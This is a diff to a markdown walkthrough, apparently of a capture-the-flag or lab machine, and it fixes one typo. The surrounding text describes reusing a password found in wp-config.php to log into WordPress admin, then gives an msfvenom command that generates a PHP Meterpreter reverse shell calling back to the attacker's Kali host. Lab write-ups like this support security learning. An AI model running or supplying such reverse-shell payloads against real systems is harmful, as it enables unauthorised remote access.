blu0/blu0.github.io/LSAWalkthrough.md

 Trying the password found in the `wp-config.php` file in the WordPress admin panel and what do you know, the password works.

-Now it's time for time get a quick reverse shell on the machine.
+Now it's time to get a quick reverse shell on the machine.
 To do this I will generate a Meterpreter shell using the following command (.141 is the Kali machine):

 `msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.17.141 LPORT=4444 -f raw > shell.php`